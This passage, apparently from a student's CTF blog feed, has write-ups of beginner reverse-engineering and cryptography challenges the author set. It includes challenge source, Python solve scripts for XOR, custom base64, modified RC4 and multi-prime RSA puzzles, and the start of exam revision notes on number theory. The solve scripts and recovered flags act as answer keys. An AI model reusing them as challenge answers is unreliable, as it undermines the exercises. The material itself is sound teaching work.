contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="number">5</span>^<span class="number">6</span> <span class="number">-1</span> <span class="comment"># => 0</span></span><br><span class="line">(<span class="number">5</span>^<span class="number">6</span>) <span class="number">-1</span> <span class="comment"># =>2</span></span><br></pre></td></tr></table></figure></div>]]></content>
<summary type="html">
<p>实验课继续水一水!</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>菜鸡的新生赛出题</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/11/30/%E8%8F%9C%E9%B8%A1%E7%9A%84%E6%96%B0%E7%94%9F%E8%B5%9B%E5%87%BA%E9%A2%98/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/11/30/%E8%8F%9C%E9%B8%A1%E7%9A%84%E6%96%B0%E7%94%9F%E8%B5%9B%E5%87%BA%E9%A2%98/</id>
<published>2020-11-30T09:45:53.263Z</published>
<updated>2021-01-03T09:59:36.746Z</updated>
<content type="html"><![CDATA[<p>我是真的菜啊!!!</p><a id="more"></a><h3 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h3><p>这次出题大概忙了差不多有半个月吧,从只会做题不会出题,到会写简单题的源代码,到会写一些有难度的题的源码,还是学到了一些东西的。</p><h3 id="0x02-RE"><a href="#0x02-RE" class="headerlink" title="0x02 RE"></a>0x02 RE</h3><h4 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h4><h5 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h5><p>今天hnqj又不想学习了,于是他决定出道签到题给大家玩玩,懂得都懂,不懂得说了也有用。很快啊,hnqj出好了,来偷袭吧干题人!</p><h5 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h5><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="keyword">const</span> <span class="keyword">char</span> a[]=<span class="string">"{opzfpzfzvzvfohyk"</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="keyword">int</span> i =<span class="number">0</span>;</span><br><span class="line"><span class="keyword">char</span> s[<span class="number">50</span>]={}; </span><br><span class="line"><span class="built_in">strcpy</span>(s, <span class="string">"abcdefghijklmnjlkj"</span>);</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i < <span class="built_in">strlen</span>(s); ++i )</span><br><span class="line"> s[i] += <span class="number">7</span>;</span><br><span class="line"> <span class="built_in">puts</span>(s);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>每个字符减七,多的不想说毕竟签到</p><h4 id="真签到"><a href="#真签到" class="headerlink" title="真签到"></a>真签到</h4><p>就随便写了个程序,动调只要会下断点就能得到答案</p><p>在<code>return 0</code>下个断点,md5得到flag</p><h4 id="逆向也就这么难了"><a href="#逆向也就这么难了" class="headerlink" title="逆向也就这么难了"></a>逆向也就这么难了</h4><p>这道题是因为我看着比赛已经打了一天了,也没几只队伍做出前两道签到题,这跟预想的不太一样啊,真心想鼓励学弟们多入坑嘿嘿嘿!</p><p>shift+f12 就是flag</p><h4 id="maze"><a href="#maze" class="headerlink" title="maze"></a>maze</h4><p>参考攻防世界新手区逆向最后一题,基本是一个类型的题目,不多说。</p><h4 id="try"><a href="#try" class="headerlink" title="try"></a>try</h4><p>题目来自海里师傅,只有一行代码,但是还挺脑洞的</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> zlib,base64,marshal</span><br><span class="line">print(base64.b64decode(zlib.decompress(base64.b64decode(<span class="string">b'eJydUjlywzAM/JJkpnVBU5pMCkBDyipcu9DQeYBMvT64aEuOm6TALLE4uACJ52mGPpr1M3T+xb5nvMU5TtOM04UQdvF0hjc1f7XrzseXOK4w44s21iQ49Ru/N783/8t8whvN2YFhNPTz0IHkV8Su9iWkHlo/WX7tczG8HnD0CwQvSHYf1P+AQjgaXxQf/u+8Bvb+ikX8NjKfvQOusXsqEl/zF6g6AmHxLWh94XuIc9TnTlwh3Fqb8r857Uka2VBnaGIxzHJuMaslzuFc6kUxl/TcYDj1UbU3aVS9w6gc8jzZH6jPQXZXLJfOkDdn40mDo51IbpJ83pPlFe2DEnvWDps4G+3WPXqTn7L2rDrljqDcoPc4ip3sPZlfaD4+V3vDnT55d4l3VvzK+5VdcW/V6OTNi/Ab3aqHd0LIsQaD5XMex4JpDhIXrYPsyJc0Vl9noVlX7p20hv+O43vsvjU9/9VzFvpXcc8t8uey4fjAOygWjkE8Hn8AFflf5g=='</span></span><br><span class="line">))))</span><br><span class="line"></span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line"><span class="comment">#得到得数放入十六进制编译器里,后缀改为pyc,再转为py得</span></span><br><span class="line"></span><br><span class="line">flag = <span class="string">'****_****_****_****'</span></span><br><span class="line">b = <span class="string">'PUALAKLVV]TQ[}QD'</span></span><br><span class="line">c = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(flag)):</span><br><span class="line"> c += chr(ord(flag[i]) ^ ord(b[i]))</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> print(c)</span><br><span class="line">------------------------------------------------------------------------------------------------</span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line">b = <span class="string">'PUALAKLVV]TQ[}QD'</span></span><br><span class="line">c = <span class="string">'cd2512d512d5123e'</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(c)):</span><br><span class="line"> flag += chr(ord(c[i]) ^ ord(b[i]))</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> print(flag)</span><br><span class="line">再按位加上<span class="string">'_'</span>得</span><br><span class="line"><span class="number">31</span>sy_py(c_go0d_jOb!</span><br></pre></td></tr></table></figure></div><h4 id="easy-cpp"><a href="#easy-cpp" class="headerlink" title="easy_cpp"></a>easy_cpp</h4><p>hl师傅写的源码比我强多了,这里就不放源码了,简单给一下exp</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">flag=<span class="string">''</span>; base64flag = <span class="string">''</span>; dict = {};</span><br><span class="line">orgin = <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(orgin)):</span><br><span class="line"> dict[orgin[i]] = orgin[i]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">6</span>, <span class="number">15</span>): </span><br><span class="line"> dict[orgin[i]] , dict[orgin[i+<span class="number">10</span>]] = dict[orgin[i+<span class="number">10</span>]] , dict[orgin[i]] <span class="comment"># 恢复base64密钥表</span></span><br><span class="line">print(dict)</span><br><span class="line">secret = <span class="string">'ZmxhZ3tiGNXlXjHfaDTzN2FfK3LycRTpc2L9'</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(secret)):</span><br><span class="line"> base64flag += dict[secret[i]]<span class="comment">#根据恢复后的base64密钥表进行部分字符转化,想当于G~O的字符转为Q~Y,Q~Y转为G~O</span></span><br><span class="line">print(base64flag)</span><br><span class="line"></span><br><span class="line"><span class="comment">#base64解码</span></span><br><span class="line">flag = base64.b64decode(base64flag)</span><br><span class="line">print(flag)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#恢复base64密钥表相当于以下算法</span></span><br><span class="line">secret1 = <span class="string">'ZmxhZ3tiGNXlXjHfaDTzN2FfK3LycRTpc2L9'</span></span><br><span class="line">a=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(secret1)):</span><br><span class="line"> <span class="keyword">if</span> ord(secret1[i])<<span class="number">80</span> <span class="keyword">and</span> ord(secret1[i])>=<span class="number">71</span>:</span><br><span class="line"> a += chr(ord(secret1[i]) + <span class="number">10</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">if</span> ord(secret1[i])<<span class="number">90</span> <span class="keyword">and</span> ord(secret1[i])>=<span class="number">81</span>:</span><br><span class="line"> a += chr(ord(secret1[i]) - <span class="number">10</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> a += chr(ord(secret1[i]))</span><br><span class="line">print(a)</span><br></pre></td></tr></table></figure></div><h4 id="大三才学的密码学"><a href="#大三才学的密码学" class="headerlink" title="大三才学的密码学"></a>大三才学的密码学</h4><p>这道题,在上一篇博客有详细题解,可以参考。</p><h3 id="0x03-密码"><a href="#0x03-密码" class="headerlink" title="0x03 密码"></a>0x03 密码</h3><h4 id="最最最基础密码"><a href="#最最最基础密码" class="headerlink" title="最最最基础密码"></a>最最最基础密码</h4><p>仿射密码,澳神直接手算!</p><h4 id="Rsa"><a href="#Rsa" class="headerlink" title="Rsa"></a>Rsa</h4><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> gmpy2 <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> sympy.ntheory.residue_ntheory <span class="keyword">import</span> nthroot_mod</span><br><span class="line">n = <span class="number">7941371739956577280160664419383740967516918938781306610817149744988379280561359039016508679365806108722198157199058807892703837558280678711420411242914059658055366348123106473335186505617418956630780649894945233345985279471106888635177256011468979083320605103256178446993230320443790240285158260236926519042413378204298514714890725325831769281505530787739922007367026883959544239568886349070557272869042275528961483412544495589811933856131557221673534170105409</span></span><br><span class="line">d = <span class="number">7515987842794170949444517202158067021118454558360145030399453487603693522695746732547224100845570119375977629070702308991221388721952258969752305904378724402002545947182529859604584400048983091861594720299791743887521228492714135449584003054386457751933095902983841246048952155097668245322664318518861440</span></span><br><span class="line">cipher = <span class="number">1618155233923718966393124032999431934705026408748451436388483012584983753140040289666712916510617403356206112730613485227084128314043665913357106301736817062412927135716281544348612150328867226515184078966397180771624148797528036548243343316501503364783092550480439749404301122277056732857399413805293899249313045684662146333448668209567898831091274930053147799756622844119463942087160062353526056879436998061803187343431081504474584816590199768034450005448200</span></span><br><span class="line">p = <span class="number">102634610559478918970860957918259981057327949366949344137104804864768237961662136189827166317524151288799657758536256924609797810164397005081733039415393</span></span><br><span class="line">q = <span class="number">7534810196420932552168708937019691994681052660068275906973480617604535381306041583841106383688654426129050931519275383386503174076258645141589911492908993</span></span><br><span class="line">r = <span class="number">10269028767754306217563721664976261924407940883784193817786660413744866184645984238866463711873380072803747092361041245422348883639933712733051005791543841</span></span><br><span class="line">phn = (p<span class="number">-1</span>)*(q<span class="number">-1</span>)*(r<span class="number">-1</span>)</span><br><span class="line">e = <span class="number">0x10001</span></span><br><span class="line">dec = invert(e,phn)</span><br><span class="line">print(dec)</span><br><span class="line">c = pow(cipher,dec,n)</span><br><span class="line">print(c)</span><br><span class="line">m = nthroot_mod(c,<span class="number">2</span>,r)</span><br><span class="line">print(m)</span><br><span class="line">print(long_to_bytes(m))</span><br></pre></td></tr></table></figure></div><h4 id="维吉尼亚"><a href="#维吉尼亚" class="headerlink" title="维吉尼亚"></a>维吉尼亚</h4><p>维吉尼亚源码,懂得都懂,密码我也不太会出,也没怎么专研,就这样吧!</p><h3 id="0x04-总结"><a href="#0x04-总结" class="headerlink" title="0x04 总结"></a>0x04 总结</h3><p>没啥好说的,觉得自己还是太菜了,源码就只放给大家一道吧,有的学弟水平应该已经远高于我。自己还是的多学多练啊,另外老师说大三也不能一直打比赛做题了,最近准备搞一搞实战了奥里给!</p>]]></content>
<summary type="html">
<p>我是真的菜啊!!!</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>新生赛出题</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/11/29/%E6%96%B0%E7%94%9F%E8%B5%9B%E5%87%BA%E9%A2%98/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/11/29/%E6%96%B0%E7%94%9F%E8%B5%9B%E5%87%BA%E9%A2%98/</id>
<published>2020-11-29T08:23:43.921Z</published>
<updated>2020-11-30T09:46:13.263Z</updated>
<content type="html"><![CDATA[<p>最近太忙,自己出题的wp也没写,基本上从周四开始到周日现在没睡过一会觉,刚回宿舍,赶紧给学弟们写写wp吧! </p><a id="more"></a><h3 id="大三才学的密码学"><a href="#大三才学的密码学" class="headerlink" title="大三才学的密码学"></a>大三才学的密码学</h3><h4 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h4><p>hnqj今天密码学课上又在timi了,老师几次下来巡视看看hnqj到底在干嘛!很快啊,当老师走到他面前的那一刻,他翻开了密码学课本,嗖的一下,他撇见了一种叫***的加密,于是hnqj嘿嘿一笑……</p><h4 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h4><p>首先进入ida中进行分析,这里有几个函数我们看一下</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/HWOvBibnxLfqyIN.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>首先进入函数sub_401760,函数里面就是两个简单的for循环。这个函数的内容与RC4初始化的内容比较相似,所以可以将这个函数命名为RC4_INIT</p><p>这里给出有关RC4初始化及加密代码的博客,仅供参考<strong><a href="https://www.cnblogs.com/zibility/p/5404478.html" target="_blank" rel="noopener">https://www.cnblogs.com/zibility/p/5404478.html</a></strong></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/CRn8NdSHQP2FW9G.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/uclQUfq7TLZWebK.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>继续继续分析sub_40188D,如果对RC4算法了解的话这里其实就是一个RC4加密,但是在异或的地方有一些不同,数据偏移加了24</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/KbelOL7ZHaN6X5i.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/Ch2Ypc93kLuOyit.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>最后我们来分析函数sub_401530,立马能注意到一串比较可疑的字符。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/J1wANtQiTXszLHa.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/bRjUyw1W7FQ8tKc.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>凭经验来看这是一串base64编码。而这个算法其实就是一个类似base64的编码运算。而那个字符串就是就是base64的码表,只是变异的。至于和真正的base64区别在于sub_401711这个函数将码表进行了偏移—向左循环24位</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/vwT3Ux8EHzABjpM.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/zQa2LfWOxMrEm3G.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>通过对每个函数进行分析之后再来看主函数的逻辑就很清楚了。</p><p>程序首先对输入进行变种rc4加密,然后通过变种的base64进行编码,将结果与密文B4QrGVzkpZVeHssap5HEgWfSQQ0zmMAA进行比较</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/29/D1XSWjl68xqFzep.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h4><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">RC4_INIT</span><span class="params">(key)</span>:</span></span><br><span class="line"> key=list(key)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(key)): </span><br><span class="line"> key[i]=ord(key[i])</span><br><span class="line"> k=[<span class="number">0</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">256</span>)]</span><br><span class="line"> s=[<span class="number">0</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">256</span>)]</span><br><span class="line"> j=<span class="number">0</span></span><br><span class="line"> length=len(key)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">256</span>):</span><br><span class="line"> s[i]=i</span><br><span class="line"> k[i]=key[i % length]</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">256</span>):</span><br><span class="line"> j=(j + s[i] + k[i])%<span class="number">256</span></span><br><span class="line"> s[i],s[j]=s[j],s[i]</span><br><span class="line"> <span class="keyword">return</span> s</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">RC4_DECRYPTE</span><span class="params">(Data,key)</span>:</span></span><br><span class="line"> Data=list(Data)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(Data)):</span><br><span class="line"> Data[i]=ord(Data[i])</span><br><span class="line"> s=RC4_INIT(key)</span><br><span class="line"> i=j=t=<span class="number">0</span></span><br><span class="line"> length=len(Data)</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> range(length):</span><br><span class="line"> i = (i+<span class="number">1</span>)%<span class="number">256</span></span><br><span class="line"> j=(j + s[i])%<span class="number">256</span></span><br><span class="line"> s[i],s[j]=s[j],s[i]</span><br><span class="line"> t=(s[i]+s[j]+<span class="number">24</span>)%<span class="number">256</span><span class="comment">#不同于正常RC4</span></span><br><span class="line"> Data[k]=Data[k]^s[t]</span><br><span class="line"> <span class="keyword">return</span> Data</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">base64_encode</span><span class="params">(s, dictionary)</span>:</span></span><br><span class="line"> r = <span class="string">""</span></span><br><span class="line"> p = <span class="string">""</span></span><br><span class="line"> c = len(s) % <span class="number">3</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (c > <span class="number">0</span>):</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(c, <span class="number">3</span>):</span><br><span class="line"> p += <span class="string">'='</span></span><br><span class="line"> s += <span class="string">"\0"</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> c <span class="keyword">in</span> range(<span class="number">0</span>, len(s), <span class="number">3</span>):</span><br><span class="line"> n = (ord(s[c]) << <span class="number">16</span>) + (ord(s[c+<span class="number">1</span>]) << <span class="number">8</span>) + (ord(s[c+<span class="number">2</span>]))</span><br><span class="line"> n = [(n >> <span class="number">18</span>) & <span class="number">0x3F</span>, (n >> <span class="number">12</span>) & <span class="number">0x3F</span>, (n >> <span class="number">6</span>) & <span class="number">0x3F</span>, n & <span class="number">0x3F</span>]</span><br><span class="line"> r += dictionary[n[<span class="number">0</span>]] + dictionary[n[<span class="number">1</span>]] + dictionary[n[<span class="number">2</span>]] + dictionary[n[<span class="number">3</span>]]</span><br><span class="line"> <span class="keyword">return</span> r[<span class="number">0</span>:len(r) - len(p)] + p</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">base64_decode</span><span class="params">(s, dictionary)</span>:</span></span><br><span class="line"> base64inv = {}</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(dictionary)):</span><br><span class="line"> base64inv[dictionary[i]] = i</span><br><span class="line"></span><br><span class="line"> s = s.replace(<span class="string">"\n"</span>, <span class="string">""</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> re.match(<span class="string">r"^([{alphabet}]{{4}})*([{alphabet}]{{3}}=|[{alphabet}]{{2}}==)?$"</span>.format(alphabet = dictionary), s):</span><br><span class="line"> <span class="keyword">raise</span> ValueError(<span class="string">"Invalid input: {}"</span>.format(s))</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> len(s) == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">""</span></span><br><span class="line"> p = <span class="string">""</span> <span class="keyword">if</span> (s[<span class="number">-1</span>] != <span class="string">"="</span>) <span class="keyword">else</span> <span class="string">"AA"</span> <span class="keyword">if</span> (len(s) > <span class="number">1</span> <span class="keyword">and</span> s[<span class="number">-2</span>] == <span class="string">"="</span>) <span class="keyword">else</span> <span class="string">"A"</span></span><br><span class="line"> r = <span class="string">""</span></span><br><span class="line"> s = s[<span class="number">0</span>:len(s) - len(p)] + p</span><br><span class="line"> <span class="keyword">for</span> c <span class="keyword">in</span> range(<span class="number">0</span>, len(s), <span class="number">4</span>):</span><br><span class="line"> n = (base64inv[s[c]] << <span class="number">18</span>) + (base64inv[s[c+<span class="number">1</span>]] << <span class="number">12</span>) + (base64inv[s[c+<span class="number">2</span>]] << <span class="number">6</span>) + base64inv[s[c+<span class="number">3</span>]]</span><br><span class="line"> r += chr((n >> <span class="number">16</span>) & <span class="number">255</span>) + chr((n >> <span class="number">8</span>) & <span class="number">255</span>) + chr(n & <span class="number">255</span>)</span><br><span class="line"> <span class="keyword">return</span> r[<span class="number">0</span>:len(r) - len(p)]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test_base64</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">import</span> base64</span><br><span class="line"> <span class="keyword">import</span> string</span><br><span class="line"> <span class="keyword">import</span> random</span><br><span class="line"> dictionary = <span class="string">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">random_string</span><span class="params">(length)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> <span class="string">''</span>.join(random.choice(string.ascii_letters) <span class="keyword">for</span> m <span class="keyword">in</span> range(length))</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">100</span>):</span><br><span class="line"> s = random_string(i)</span><br><span class="line"> encoded = base64_encode(s, dictionary)</span><br><span class="line"> <span class="keyword">assert</span>(encoded == base64.b64encode(s))</span><br><span class="line"> <span class="keyword">assert</span>(s == base64_decode(encoded, dictionary))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> </span><br><span class="line"> dictionary = <span class="string">'Mq/J0tTI1RkSimKFwnczo2VXpPshL4_UgjH6DEG39yr+aOYWCfBeN5lb8v7QdxZuA'</span><span class="comment">#向左平移后的码表</span></span><br><span class="line"> Data=base64_decode(<span class="string">"B4QrGVzkpZVeHssap5HEgWfSQQ0zmMAA"</span>, dictionary)</span><br><span class="line"> key=<span class="string">'Please input the flag:\n'</span></span><br><span class="line"> flag=RC4_DECRYPTE(Data,key)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line"> print(chr(i),end=<span class="string">''</span>)</span><br><span class="line"> print()</span><br></pre></td></tr></table></figure></div><h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>更多相关出题信息将在最近几天上传到博客<strong><a href="https://gha01un.github.io/" target="_blank" rel="noopener">https://gha01un.github.io/</a></strong></p><p>欢迎各位大佬踩踩!</p>]]></content>
<summary type="html">
<p>最近太忙,自己出题的wp也没写,基本上从周四开始到周日现在没睡过一会觉,刚回宿舍,赶紧给学弟们写写wp吧! </p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>信息安全数学基础复习总结</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/11/25/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80%E5%A4%8D%E4%B9%A0%E6%80%BB%E7%BB%93/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/11/25/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80%E5%A4%8D%E4%B9%A0%E6%80%BB%E7%BB%93/</id>
<published>2020-11-25T10:20:42.845Z</published>
<updated>2020-11-25T10:28:36.071Z</updated>
<content type="html"><![CDATA[<p>学不动了学不动了,压抑一周了已经,心情也不好,每天水水博客找点存在感吧,呜呜呜好难过啊</p><a id="more"></a><h4 id="第1章-整数"><a href="#第1章-整数" class="headerlink" title="第1章 整数"></a><strong>第1章 整数</strong></h4><p><strong>知识点:</strong></p><p>1.整除的概念及性质</p><p>2.欧几里得除法</p><p>3.素数的平凡判别</p><p>4.b进制,会进制转换</p><p>5.最大公因数定义及相关性质</p><p>6.广义欧几里得除法计算最大公因数</p><p>7.最小公倍数计算及相关性质</p><p>8.算术基本定理的应用,会45页的定理1.6.4</p><p><strong>要考题型:</strong></p><p>1.证明整除性(法一,利用整除性质;法二,利用同余性质)</p><p>2.素数相关证明及判断</p><p>3.求最大公因数(欧几里得除法)</p><p>4.求s,t使得sa+tb=1(代入法或者列表法)</p><p>5.整数的表示</p><h4 id="第2章-同余"><a href="#第2章-同余" class="headerlink" title="第2章 同余"></a><strong>第2章 同余</strong></h4><p><strong>知识点:</strong></p><p>1.同余的概念、性质及判断</p><p>2.剩余类、完全剩余系、简化剩余类、简化剩余系的概念及区别,能写出一个具体数的以上几种类型数字</p><p>3.两个模、多个模的完全剩余系和简化剩余系的性质</p><p>4.欧拉定理、费马定理、Wilson定理</p><p>5.模重复平方计算法(老师说,不一定按这个步骤来,但要会算出a模m和谁同余,a、m是具体的数字,结果要算对)</p><p><strong>要考题型:</strong></p><p>1.剩余类、系的概念,很有可能是给出一个具体数字,让你写出剩余类、完全剩余系、简化剩余类、简化剩余系</p><p>2.求模幂,就是一个数a的p次方模m和谁同余,用好欧拉定理</p><p>3.可以用同余性质去证明整除</p><p>4.同余性质的证明</p><p>5.对于ap mod m,m很大的时候,想要求同余,可以将同余式转为同余式组,分别计算出结果,再用中国剩余定理求解</p><h4 id="第3章-同余式"><a href="#第3章-同余式" class="headerlink" title="第3章 同余式"></a><strong>第3章 同余式</strong></h4><p><strong>知识点即考点:</strong></p><p>1.一次同余式求解</p><p>2.二次同余式求解(用中国剩余定理)</p><p>3.高次同余式的求解</p><p>4.高次同余式的提升(模数为mn形式)</p><p>5.素数模的同余式化简</p><p>6.素数模的同余式解数估计</p><h4 id="第4章-二次剩余"><a href="#第4章-二次剩余" class="headerlink" title="第4章 二次剩余"></a><strong>第4章 二次剩余</strong></h4><p><strong>知识点:</strong></p><p>1.模为奇素数的平方剩余与平方非剩余概念</p><p>2.勒让德符号定义及相关计算的性质</p><p>3.二次互反律</p><p>4.雅克比符号(不再限定模数必须为奇素数,见到一个二次同余式,就可直接用勒让德符号的计算性质包含二次互反律,来判断同余式是否有解。但是要判断同余式具体的解数时,还是要将同余式拆为模数为奇数的同余式组,解数为各个同余式解数的乘积)</p><p><strong>要考题型:</strong></p><p>1.求二次剩余</p><p>2.判断是否是二次剩余,二次同余式是否有解</p><p>3.求椭圆曲线上的所有点</p><p>4.判断二次同余式的解数</p><p>5.求满足(a/p)的所有p</p><h4 id="第5章-原根与指标"><a href="#第5章-原根与指标" class="headerlink" title="第5章 原根与指标"></a><strong>第5章 原根与指标</strong></h4><p><strong>知识点:</strong></p><p>1.指数定义与性质</p><p>2.原根定义与性质</p><p>3.指标定义与性质</p><p><strong>要考题型:</strong></p><p>1.求指数(可能要利用指数性质)</p><p>2.求原根</p><p>①模p原根</p><p>②模p2原根</p><p>③模pα原根</p><p>④模2pα原根</p><p>上面这几个是层层递进的,从①到④逐个求解</p><p>3.求指标</p><p>4.利用指标来求高次同余式,例题在195页的例5.3.6,先判断是否有解,再利用指标表(考试会给出)求解。</p><h4 id="第6章-素性检验"><a href="#第6章-素性检验" class="headerlink" title="第6章 素性检验"></a><strong>第6章 